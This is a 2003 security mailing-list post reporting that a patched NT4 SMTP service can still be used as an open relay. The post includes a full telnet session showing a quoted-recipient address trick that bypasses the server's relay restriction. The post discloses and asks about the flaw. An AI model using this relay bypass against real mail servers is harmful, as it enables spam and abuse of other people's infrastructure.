Can NT4 SMTP Service be misused for mail spamming
From: st0ff st0ff (if0ff_at_YAHOO.COM)
Date: 08/25/03
- Previous message: Russ: "Re: Administrivia #30766 - Russ Cooper's Internet Penalties Plan"
- Next in thread: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
- Maybe reply: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 25 Aug 2003 05:38:53 -0700 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Hi List
I'm became aware, that it is possible to relay mails
on a fully patched NT4 box. The SMTP service, which is
part of the optionpack is the subject matter.
I've installed SP6a with the SRP Q299444 and the
newest IIS cumulative patch Q811114. The configuration
disallow to relay mails on this server, except for the
domain foobar.com.
If I send an email as follows, the mail is going to be
relayed:
> telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220-foobar.com Microsoft SMTP MAIL ready at Wed, 25
Aug 2003 10:50:27 +0200 Version: 5.5.1877.197.19 220
ESMTP spoken here helo localhost
250 foobar.com Hello [2.2.2.2]
mail from: spammer@foo.com
250 spammer@foo.com....Sender OK
rcpt to: "victim@whatever.com"@foobar.com
250 "victim@whatever.com"@foobar.com
data
354 Start mail input; end with <CRLF>.<CRLF>
subject: spamtest
test
.
250 0892a4350054683343212 Queued mail for delivery
quit
221 foobar.com Service closing transmission channel
Connection closed by foreign host.
Is that a bug, a misconfiguration or did I miss a
patch?
Thanks a lot
if0ff
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Whatever Happened to Octopus?
LEGATO RepliStor, formerly known as Octopus, delivers breakthrough
replication performance that's 5X faster than the competition in an
independent head-to-head test. Learn how RepliStor uses patented,
asynchronous, real-time replication, to deliver disaster recovery, data
distribution and consolidated backups. It is the first replication solution
to achieve Windows 2003 certification. Get the performance report now.
http://portal1.legato.com/products/replistor/upgrade.cfm
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Previous message: Russ: "Re: Administrivia #30766 - Russ Cooper's Internet Penalties Plan"
- Next in thread: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
- Maybe reply: eric_at_LIEGE.COM: "Re: Can NT4 SMTP Service be misused for mail spamming"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
